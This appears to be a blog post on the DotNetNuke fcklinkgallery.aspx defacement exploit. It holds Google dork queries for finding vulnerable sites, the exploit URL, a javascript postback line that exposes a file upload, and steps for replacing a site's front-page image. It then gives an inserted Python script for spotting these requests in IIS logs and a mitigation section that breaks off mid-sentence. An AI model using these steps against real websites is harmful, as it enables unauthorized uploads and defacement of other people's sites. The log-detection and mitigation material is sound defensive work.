As Hmei7 posted on Twitter, he might be using an old DNN [DotNetNuke] exploit. But how difficult is this exploit? To be honest, it is as easy as hell. Only script kiddies would still use it.
First, check whether the website is vulnerable or not.
To find such websites simply copy this code to Google and hit enter:
inurl:/portals/0
or
inurl:/tabid/36/language/en-US/Default.aspx
Open the home page and check the location of any image on it. It should be located in /portals/0/
For example, in the case of http://www.example.com the image is located at:
http://www.example.com/Portals/0/SHM.jpg
Yeah... it means this website is vulnerable and we can change the front page pic.
Now the current image name is SHM.jpg. Rename the new image, which you want to upload as proof that you owned the system, to SHM.jpg.
Now here is the exploit:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
How to deface?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JavaScript, you will see the option for Upload Selected File.
Now select your image file, which you have renamed as SHM.jpg, and upload it here.
Go to main page and refresh... That's it, you have defaced the website.
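Seen from the server side, the steps above leave a trace in the IIS logs: a GET and then a POST to fcklinkgallery.aspx. The following is an added example, not part of the original post, that pulls those requests out of a W3C-format log; the log lines, IP addresses and function names are constructed for illustration.

```python
from collections import defaultdict

# Path named on this page; IIS is case-insensitive, so compare lower-cased.
GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-01-10 08:01:11 GET /Default.aspx - 198.51.100.7 200
2012-01-10 08:02:40 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2012-01-10 08:03:05 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2012-01-10 08:03:30 GET /Portals/0/SHM.jpg - 203.0.113.9 200
2012-01-10 09:15:00 GET /providers/htmleditorproviders/fck/FCKLINKGALLERY.ASPX - 192.0.2.44 404
"""

def gallery_hits(log_text):
    """Return {client_ip: [(timestamp, method, status), ...]} for gallery requests."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() == GALLERY:
            stamp = f"{row.get('date', '')} {row.get('time', '')}".strip()
            hits[row.get("c-ip", "?")].append(
                (stamp, row.get("cs-method", "?"), row.get("sc-status", "?")))
    return dict(hits)

def likely_uploads(hits):
    """Clients whose POST to the gallery got a 2xx: postbacks to review for uploads."""
    return sorted(ip for ip, reqs in hits.items()
                  if any(m == "POST" and s.startswith("2") for _, m, s in reqs))

if __name__ == "__main__":
    found = gallery_hits(SAMPLE_LOG)
    for ip, reqs in found.items():
        print(ip, reqs)
    print("review uploads from:", likely_uploads(found))
```

Once the file has been renamed, requests to the old path should show up in this output with a 404 status.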
How to mitigate?
Because there is no known fix, there are only ways to mitigate this attack (and hence it is a zero-day hack).
1. Rename the fcklinkgallery.aspx file
As fcklinkgallery.aspx is the entry point for this hack attack, the first thing to do is to rename this file. I suggest using a random file name, like a GUID. After you rename the file, you will need to update the “LinksGalleryPath” setting in your config file. This will be found in the